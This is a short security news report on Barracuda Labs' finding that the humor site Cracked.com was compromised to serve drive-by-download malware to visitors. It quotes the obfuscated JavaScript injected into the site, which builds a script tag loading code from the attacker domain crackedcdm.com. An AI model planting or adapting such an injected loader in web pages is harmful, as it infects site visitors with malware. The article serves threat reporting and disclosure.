Barracuda Labs researches discovered that the popular humor website Cracked_com was compromised used by attackers to serve malware.
Cracked_com, the popular humor website, was compromised and used to serve malware that infected its visitors during the weekend and according to Barracuda Labs research the alarm could be not considered closed.
The attackers used the classic drive-by-downloads to spread the malicious code, despite it isn’t know the precise number of infected machines it is easy to imagine that a wide audience have been compromised considering that Cracked_com is one of most popular US websites.
Let’s consider also that at the time of this post the malware used is detected by 7 out of the 46 antivirus engines tested by virustotal.com, Barracuda Labs malware specialists claim that the infection is a stealthy one, the unique evidence of infection is represented by the fact that a java plugin has launched and that the system is running on low memory.
The exploit was served with the following malicious javascript on cracked_com which sends a request to crackedcdm.com:
var tyi = “cdm.”; var itwo = “cracked”; var itto = “/”; var phw = “php”; var jfw = “src”; var fscr = “script”; var twi = “i”; var htp = “http”; var vol54 = “src”;document.write(“<”+fscr+” “+jfw+”=”+htp+”:”+itto+””+itto+””+twi+”.”+itwo+””+tyi+”com”+itto+””+twi+”.”+phw+”><”+itto+””+fscr+”>”);
The domain crackedcdm.com was registered on 2013-11-04, which suggests that attackers had the ability to serve their content from cracked_com at least that early.
Cracked_com announced to have resolved the problem sometime Tuesday, but Barracuda Labs claimz the site is still infected.
(Security Affairs – malware, Cracked_com)